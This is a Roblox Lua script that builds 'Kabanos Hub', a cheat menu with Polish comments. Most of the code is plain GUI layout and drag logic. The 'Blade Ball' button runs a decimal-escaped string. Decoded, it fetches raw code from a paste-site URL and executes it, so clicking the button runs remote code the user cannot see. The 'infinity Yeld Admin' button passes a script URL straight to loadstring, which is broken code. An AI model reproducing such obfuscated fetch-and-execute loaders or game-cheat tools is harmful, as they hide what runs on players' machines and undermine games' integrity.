-- Gui to Lua
-- Version: 3.2

-- Instances:

local KabanosGui = Instance.new("ScreenGui")
local Open = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local Kabanos = Instance.new("Frame")
local panel1 = Instance.new("Frame")
local HubName = Instance.new("TextLabel")
local UICorner_2 = Instance.new("UICorner")
local Player = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local PlayerGui = Instance.new("ScrollingFrame")
local TextLabel = Instance.new("TextLabel")
local Render = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local RenderGui = Instance.new("ScrollingFrame")
local TextLabel_2 = Instance.new("TextLabel")
local ScriptHub = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local ScriptHubGui = Instance.new("ScrollingFrame")
local BladeBall = Instance.new("TextButton")
local infyeldadmin = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local Settings = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local SettingsGui = Instance.new("ScrollingFrame")
local TextLabel_3 = Instance.new("TextLabel")
local TextLabel_4 = Instance.new("TextLabel")
local TextLabel_5 = Instance.new("TextLabel")

--Properties:

KabanosGui.Name = "KabanosGui"
KabanosGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
KabanosGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Open.Name = "Open"
Open.Parent = KabanosGui
Open.BackgroundColor3 = Color3.fromRGB(67, 67, 67)
Open.BorderColor3 = Color3.fromRGB(0, 0, 0)
Open.BorderSizePixel = 0
Open.Position = UDim2.new(0, 0, 0.79475981, 0)
Open.Size = UDim2.new(0, 47, 0, 26)
Open.Font = Enum.Font.SourceSans
Open.Text = "Otwórz"
Open.TextColor3 = Color3.fromRGB(255, 255, 255)
Open.TextSize = 14.000

UICorner.Parent = Open

Kabanos.Name = "Kabanos"
Kabanos.Parent = KabanosGui
Kabanos.BackgroundColor3 = Color3.fromRGB(58, 58, 58)
Kabanos.BorderColor3 = Color3.fromRGB(0, 0, 0)
Kabanos.BorderSizePixel = 0
Kabanos.Position = UDim2.new(0.329710156, 0, 0.336244553, 0)
Kabanos.Size = UDim2.new(0, 355, 0, 224)

panel1.Name = "panel1"
panel1.Parent = Kabanos
panel1.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
panel1.BorderColor3 = Color3.fromRGB(0, 0, 0)
panel1.BorderSizePixel = 0
panel1.Size = UDim2.new(0, 355, 0, 22)

HubName.Name = "HubName"
HubName.Parent = panel1
HubName.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
HubName.BackgroundTransparency = 1.000
HubName.BorderColor3 = Color3.fromRGB(0, 0, 0)
HubName.BorderSizePixel = 0
HubName.Size = UDim2.new(0, 115, 0, 22)
HubName.Font = Enum.Font.Unknown
HubName.Text = "Kabanos Hub"
HubName.TextColor3 = Color3.fromRGB(255, 255, 255)
HubName.TextScaled = true
HubName.TextSize = 14.000
HubName.TextWrapped = true

UICorner_2.Parent = panel1

Player.Name = "Player"
Player.Parent = Kabanos
Player.BackgroundColor3 = Color3.fromRGB(44, 44, 44)
Player.BorderColor3 = Color3.fromRGB(0, 0, 0)
Player.BorderSizePixel = 0
Player.Position = UDim2.new(0.0222092327, 0, 0.125, 0)
Player.Size = UDim2.new(0, 81, 0, 24)
Player.Font = Enum.Font.SourceSans
Player.Text = "Player"
Player.TextColor3 = Color3.fromRGB(255, 255, 255)
Player.TextScaled = true
Player.TextSize = 14.000
Player.TextWrapped = true

UICorner_3.Parent = Player

PlayerGui.Name = "PlayerGui"
PlayerGui.Parent = Player
PlayerGui.Active = true
PlayerGui.BackgroundColor3 = Color3.fromRGB(47, 47, 47)
PlayerGui.BorderColor3 = Color3.fromRGB(0, 0, 0)
PlayerGui.BorderSizePixel = 0
PlayerGui.Position = UDim2.new(0, 0, 1.25, 0)
PlayerGui.Size = UDim2.new(0, 338, 0, 158)

TextLabel.Parent = PlayerGui
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.239644974, 0, 0.0632911399, 0)
TextLabel.Size = UDim2.new(0, 171, 0, 28)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "CoomingSoon"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

Render.Name = "Render"
Render.Parent = Kabanos
Render.BackgroundColor3 = Color3.fromRGB(44, 44, 44)
Render.BorderColor3 = Color3.fromRGB(0, 0, 0)
Render.BorderSizePixel = 0
Render.Position = UDim2.new(0.273084342, 0, 0.125, 0)
Render.Size = UDim2.new(0, 77, 0, 24)
Render.Font = Enum.Font.SourceSans
Render.Text = "Render"
Render.TextColor3 = Color3.fromRGB(255, 255, 255)
Render.TextScaled = true
Render.TextSize = 14.000
Render.TextWrapped = true

UICorner_4.Parent = Render

RenderGui.Name = "RenderGui"
RenderGui.Parent = Render
RenderGui.Active = true
RenderGui.BackgroundColor3 = Color3.fromRGB(47, 47, 47)
RenderGui.BorderColor3 = Color3.fromRGB(0, 0, 0)
RenderGui.BorderSizePixel = 0
RenderGui.Position = UDim2.new(-1.15584254, 0, 1.25, 0)
RenderGui.Size = UDim2.new(0, 338, 0, 158)
RenderGui.Visible = false

TextLabel_2.Parent = RenderGui
TextLabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.239644974, 0, 0.0632911399, 0)
TextLabel_2.Size = UDim2.new(0, 171, 0, 28)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "CoomingSoon"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

ScriptHub.Name = "ScriptHub"
ScriptHub.Parent = Kabanos
ScriptHub.BackgroundColor3 = Color3.fromRGB(44, 44, 44)
ScriptHub.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScriptHub.BorderSizePixel = 0
ScriptHub.Position = UDim2.new(0.512877882, 0, 0.125, 0)
ScriptHub.Size = UDim2.new(0, 78, 0, 24)
ScriptHub.Font = Enum.Font.SourceSans
ScriptHub.Text = "Script Hub"
ScriptHub.TextColor3 = Color3.fromRGB(255, 255, 255)
ScriptHub.TextScaled = true
ScriptHub.TextSize = 14.000
ScriptHub.TextWrapped = true

UICorner_5.Parent = ScriptHub

ScriptHubGui.Name = "ScriptHubGui"
ScriptHubGui.Parent = ScriptHub
ScriptHubGui.Active = true
ScriptHubGui.BackgroundColor3 = Color3.fromRGB(47, 47, 47)
ScriptHubGui.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScriptHubGui.BorderSizePixel = 0
ScriptHubGui.Position = UDim2.new(-2.23276544, 0, 1.25, 0)
ScriptHubGui.Size = UDim2.new(0, 338, 0, 158)
ScriptHubGui.Visible = false

BladeBall.Name = "BladeBall"
BladeBall.Parent = ScriptHubGui
BladeBall.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
BladeBall.BorderColor3 = Color3.fromRGB(0, 0, 0)
BladeBall.BorderSizePixel = 0
BladeBall.Size = UDim2.new(0, 338, 0, 32)
BladeBall.Font = Enum.Font.SourceSans
BladeBall.Text = "Blade Ball"
BladeBall.TextColor3 = Color3.fromRGB(255, 255, 255)
BladeBall.TextScaled = true
BladeBall.TextSize = 14.000
BladeBall.TextWrapped = true

infyeldadmin.Name = "infyeldadmin"
infyeldadmin.Parent = ScriptHubGui
infyeldadmin.BackgroundColor3 = Color3.fromRGB(48, 48, 48)
infyeldadmin.BorderColor3 = Color3.fromRGB(0, 0, 0)
infyeldadmin.BorderSizePixel = 0
infyeldadmin.Position = UDim2.new(0, 0, 0.202531651, 0)
infyeldadmin.Size = UDim2.new(0, 338, 0, 32)
infyeldadmin.Font = Enum.Font.SourceSans
infyeldadmin.Text = "infinity Yeld Admin"
infyeldadmin.TextColor3 = Color3.fromRGB(255, 255, 255)
infyeldadmin.TextScaled = true
infyeldadmin.TextSize = 14.000
infyeldadmin.TextWrapped = true

UICorner_6.Parent = Kabanos

Settings.Name = "Settings"
Settings.Parent = Kabanos
Settings.BackgroundColor3 = Color3.fromRGB(44, 44, 44)
Settings.BorderColor3 = Color3.fromRGB(0, 0, 0)
Settings.BorderSizePixel = 0
Settings.Position = UDim2.new(0.751553893, 0, 0.125, 0)
Settings.Size = UDim2.new(0, 80, 0, 24)
Settings.Font = Enum.Font.SourceSans
Settings.Text = "Settings"
Settings.TextColor3 = Color3.fromRGB(255, 255, 255)
Settings.TextScaled = true
Settings.TextSize = 14.000
Settings.TextWrapped = true

UICorner_7.Parent = Settings

SettingsGui.Name = "SettingsGui"
SettingsGui.Parent = Settings
SettingsGui.Active = true
SettingsGui.BackgroundColor3 = Color3.fromRGB(47, 47, 47)
SettingsGui.BorderColor3 = Color3.fromRGB(0, 0, 0)
SettingsGui.BorderSizePixel = 0
SettingsGui.Position = UDim2.new(-3.24526525, 0, 1.25, 0)
SettingsGui.Size = UDim2.new(0, 338, 0, 158)
SettingsGui.Visible = false

TextLabel_3.Parent = SettingsGui
TextLabel_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(0.304733723, 0, 0.487341762, 0)
TextLabel_3.Size = UDim2.new(0, 127, 0, 18)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Verision: 0.0.1"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

TextLabel_4.Parent = SettingsGui
TextLabel_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.BorderSizePixel = 0
TextLabel_4.Position = UDim2.new(0.239644974, 0, 0.310126573, 0)
TextLabel_4.Size = UDim2.new(0, 171, 0, 28)
TextLabel_4.Font = Enum.Font.SourceSans
TextLabel_4.Text = "By xxCichyxx"
TextLabel_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.TextScaled = true
TextLabel_4.TextSize = 14.000
TextLabel_4.TextWrapped = true

TextLabel_5.Parent = SettingsGui
TextLabel_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_5.BackgroundTransparency = 1.000
TextLabel_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_5.BorderSizePixel = 0
TextLabel_5.Position = UDim2.new(0.239644974, 0, 0.0632911399, 0)
TextLabel_5.Size = UDim2.new(0, 171, 0, 28)
TextLabel_5.Font = Enum.Font.SourceSans
TextLabel_5.Text = "CoomingSoon"
TextLabel_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_5.TextScaled = true
TextLabel_5.TextSize = 14.000
TextLabel_5.TextWrapped = true

-- Scripts:

local function BSNQK_fake_script() -- ScriptHubGui.LocalScript 
    local script = Instance.new('LocalScript', ScriptHubGui)

    local Bladeball = script.Parent:FindFirstChild("BladeBall")
    local infyeld = script.Parent:FindFirstChild("infyeldadmin")
    
    Bladeball.MouseButton1Click:Connect(function() 
        loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\102\114\101\101\110\111\116\101\46\98\105\122\47\114\97\119\47\110\102\122\48\122\113\100\121\117\110\34\41\41\40\41\10")()
    end)
    
    infyeld.MouseButton1Click:Connect(function() 
        loadstring("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source")
    end)
end
coroutine.wrap(BSNQK_fake_script)()
local function YRVYJS_fake_script() -- Kabanos.Kategorie 
    local script = Instance.new('LocalScript', Kabanos)

    local buttonRender = script.Parent:FindFirstChild("Render")
    local buttonScriptHub = script.Parent:FindFirstChild("ScriptHub")
    local buttonSettings = script.Parent:FindFirstChild("Settings")
    local buttonPlayer = script.Parent:FindFirstChild("Player")
    local renderGui = script.Parent.Render:FindFirstChild("RenderGui")
    local scriptHubGui = script.Parent.ScriptHub:FindFirstChild("ScriptHubGui")
    local settingsGui = script.Parent.Settings:FindFirstChild("SettingsGui")
    local buttonGui = script.Parent.Player:FindFirstChild("PlayerGui")
    
    local function toggleGui(gui, ...)
        -- Zamknij wszystkie inne GUI
        for _, otherGui in ipairs({...}) do
            if otherGui ~= gui then
                otherGui.Visible = false
            end
        end
        -- Przełącz widoczność wybranego GUI
        gui.Visible = not gui.Visible
    end
    buttonRender.MouseButton1Click:Connect(function()
        toggleGui(renderGui, scriptHubGui, settingsGui, buttonGui)
    end)
    
    buttonScriptHub.MouseButton1Click:Connect(function()
        toggleGui(scriptHubGui, renderGui, settingsGui, buttonGui)
    end)
    
    buttonSettings.MouseButton1Click:Connect(function()
        toggleGui(settingsGui, renderGui, scriptHubGui, buttonGui)
    end)
    
    buttonPlayer.MouseButton1Click:Connect(function()
        toggleGui(buttonGui, renderGui, scriptHubGui, settingsGui)
    end)
end
coroutine.wrap(YRVYJS_fake_script)()
local function KTFEB_fake_script() -- KabanosGui.Otwieranie 
    local script = Instance.new('LocalScript', KabanosGui)

    local button = script.Parent:FindFirstChild("Open")
    local gui = button.Parent -- Zakładam, że oba elementy są w tym samym ScreenGui
    local frame = gui:FindFirstChild("Kabanos") -- Zmień "Kabanos" na nazwę swojego elementu GUI
    
    local function UruchomKabanosHub()
        if frame then
            frame.Visible = not frame.Visible
        else
            warn("Nie znaleziono elementu o nazwie 'Kabanos'")
        end
    end
    
    
    -- Funkcjonalność przycisków
    button.MouseButton1Click:Connect(UruchomKabanosHub)
    
    -- Zmienne pomocnicze dla przeciągania
    local dragging = false
    local dragStart = nil
    local startPos = nil
    
    -- Funkcja rozpoczynająca przeciąganie
    local function startDrag(input)
        dragging = true
        dragStart = input.Position
        startPos = frame.Position
    
        input.Changed:Connect(function()
            if input.UserInputState == Enum.UserInputState.End then
                dragging = false
            end
        end)
    end
    
    -- Funkcja aktualizująca przeciąganie
    local function updateDrag(input)
        if dragging then
            local delta = input.Position - dragStart
            frame.Position = UDim2.new(
                startPos.X.Scale,
                startPos.X.Offset + delta.X,
                startPos.Y.Scale,
                startPos.Y.Offset + delta.Y
            )
        end
    end
    
    -- Podłączenie funkcji do zdarzeń przeciągania
    frame.InputBegan:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseButton1 then
            startDrag(input)
        end
    end)
    
    frame.InputChanged:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseMovement then
            updateDrag(input)
        end
    end)
    
    frame.InputEnded:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseButton1 then
            dragging = false
        end
    end)
end
coroutine.wrap(KTFEB_fake_script)()
